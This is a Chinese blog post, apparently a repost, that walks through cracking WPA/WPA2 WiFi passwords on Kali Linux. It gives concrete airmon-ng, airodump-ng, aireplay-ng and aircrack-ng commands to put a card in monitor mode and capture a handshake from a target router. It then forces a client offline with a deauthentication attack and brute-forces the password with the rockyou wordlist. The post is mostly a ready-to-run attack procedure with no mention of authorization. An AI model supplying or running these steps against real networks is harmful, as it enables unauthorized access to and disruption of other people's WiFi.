zoukankan      html  css  js  c++  java
  • WiFi密码破解(wpa/wpa2)

    参考一篇很好的贴子:https://www.cnblogs.com/daoyi/p/Kali-Linux-shi-yongAircrack-po-jiewifi-mi-ma-wpawp.html

    #前期准备

        a.一张RT3070 USB无线网卡,或者其它可以监听的无线网卡

        b.kali linux 系统

        c.字典文件,kali里自带rockyou.txt.gz,使用前自行解压,位置在/user/share/wordlists/rockyou.txt.gz

    (1)在虚拟机中打开kali linux后再插入USB 型无线网卡完成系统自动识别与安装

    在终端执行

    # airmon-ng

    通过该命令可以查看到无线网卡信息,如果没有显示任何信息,可能是你的无线网卡不支持监听模式,意味着你不能继续以下的操作!

    (2)开启无线网卡监听模式

    #airmon start wlan0 

    注意网卡接口改为wlan0mon

    (3)搜索附近WIFI信息

     airodump-ng wlan0mon

    参数解释:

    BSSID:目标路由器或者无线热点的MAC地址

    CH:频道

    ESSID:目标路由器或者无线热点的名称

    (4)抓取握手包

    这是关键步骤,当我们强行让连接路由器的用户短线时,用户会重新再发送一个握手包(包含密码),也就是利用这一特性。

    # airodump-ng -c 6 --bssid 54:B1:21:9F:33:99  -w ~/ wlan0mon

    参数解释:

    -c:指定频道号

    --bssid:指定路由器

    -w:指定抓取后的包保存位置

    ctrl+c:停止抓包

    打开新终端,并执行命令:

    aireplay-ng -0 2 -a 54:B1:21:9F:33:99 -c D8:81:98:84:1B:10 wlan0mon

    参数解释:

    -0:表示发起deauthentication攻击

    -a:指定无线路由器BSSID

    -c:指定强制断开的设备

    如果抓包成功就会如上图红框显示。

    (5)开始破解密码

    # aircrack-ng -a2 -b 54:B1:21:9F:33:99 -w /usr/share/wordlists/rockyou.txt ~/*.cap

    参数解释:

    -a2:代表WPA的握手包

    -b:指定要破解的wifi BSSID。

    -w:指定字典文件

      最后是抓取的包(位置)

    总结:该方法只能够破解弱口令,长而复杂的密码就无能为力了。

  • 相关阅读:
    《APP》团队冲刺第二阶段 八
    《APP》团队冲刺第二阶段 七
    《APP》团队冲刺第二阶段 六
    《APP》团队冲刺第二阶段 五
    《APP》团队冲刺第二阶段 四
    团队项目总结(事后诸葛亮)
    第二阶段团队效绩
    团队项目-第二阶段冲刺-10
    团队项目-第二阶段冲刺-9
    团队项目-第二阶段冲刺-8
  • 原文地址:https://www.cnblogs.com/python-wen/p/9755543.html
Copyright © 2011-2022 走看看